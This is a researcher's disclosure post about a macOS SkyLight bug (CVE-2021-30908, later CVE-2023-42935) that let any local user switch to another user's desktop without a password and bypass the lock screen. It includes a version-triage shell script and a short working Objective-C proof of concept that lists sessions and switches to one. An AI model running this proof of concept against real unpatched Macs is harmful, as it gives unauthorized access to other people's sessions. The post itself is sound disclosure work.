amy's website


SkyLight sessions bug

In some macOS versions, SLSSessionSwitchToSessionID didn't check the caller's privileges, letting any user switch to another logged-in user's desktop without their password. If the Guest account was enabled, this could be used to bypass the lock screen.

I reported this in September 2021; it was fixed in macOS 11.6.1 and macOS 12.0.1:

Impact: A local attacker may be able to view the previous logged in user’s desktop from the fast user switching screen
Description: An authentication issue was addressed with improved state management.
CVE-2021-30908: ASentientBot

Amusingly, the bug reappeared in macOS Ventura, and it was fixed again in macOS 13.6.4 and macOS 14.1 as CVE-2023-42935.

I received an Apple Security Bounty both times.

It still works on macOS Catalina and older.
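
For triage, the version boundaries above can be turned into a host check; this is an added example, not the author's code, and its function names are hypothetical. It assumes every 13.x release before 13.6.4 and every 14.0.x release is affected, that 11.6.1+ and 12.0.1+ stayed fixed, and that releases after 14.1 keep the fix.

```shell
#!/bin/sh
# Added example (not the author's code): triage a macOS version against the
# fix releases quoted on this page.

# ver_num "13.6.4" -> 13006004 (missing fields count as 0)
ver_num() {
    IFS=. read -r _maj _min _pat <<EOF
$1
EOF
    echo $(( ${_maj:-0} * 1000000 + ${_min:-0} * 1000 + ${_pat:-0} ))
}

# below A B -> true when version A is older than version B
below() { [ "$(ver_num "$1")" -lt "$(ver_num "$2")" ]; }

# Prints one of: affected-unfixed, affected, fixed, unknown
session_switch_status() {
    case $1 in ''|*[!0-9.]*) echo unknown; return 0 ;; esac
    case ${1%%.*} in
        10) echo affected-unfixed ;;   # page: still works on Catalina and older
        11) if below "$1" 11.6.1; then echo affected; else echo fixed; fi ;;
        12) if below "$1" 12.0.1; then echo affected; else echo fixed; fi ;;
        13) if below "$1" 13.6.4; then echo affected; else echo fixed; fi ;;
        14) if below "$1" 14.1;   then echo affected; else echo fixed; fi ;;
        # Assumption: releases after 14.1 keep the fix; anything below 10 is not classified.
        *)  if below "$1" 10; then echo unknown; else echo fixed; fi ;;
    esac
}

# On a Mac, report this host and whether the Guest account is enabled
# (Guest is what turns the bug into a lock screen bypass).
if command -v sw_vers >/dev/null 2>&1; then
    ver=$(sw_vers -productVersion)
    guest=$(defaults read /Library/Preferences/com.apple.loginwindow GuestEnabled 2>/dev/null || echo 0)
    echo "macOS $ver: $(session_switch_status "$ver") (GuestEnabled=$guest)"
fi
```
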

thanks

Thank you to emma (916253) and ASentientHedgehog for testing on countless versions and helping me navigate the reporting process!

sample code

This program will switch to another user's desktop on affected versions.

@import Foundation;

extern const NSString* kCGSSessionIDKey;
extern const NSString* kCGSSessionLongUserNameKey;
NSArray<NSDictionary*>* CGSCopySessionList();
void CGSSessionSwitchToSessionID(int);

int main(int argCount,char** args)
{
	if(argCount!=2)
	{
		NSLog(@"usage: %s <session id>\n",args[0]);
		
		for(NSDictionary* session in CGSCopySessionList())
		{
			NSLog(@"%@ %@\n",session[kCGSSessionIDKey],session[kCGSSessionLongUserNameKey]);
		}
		
		return 1;
	}
	
	CGSSessionSwitchToSessionID(@(args[1]).intValue);
}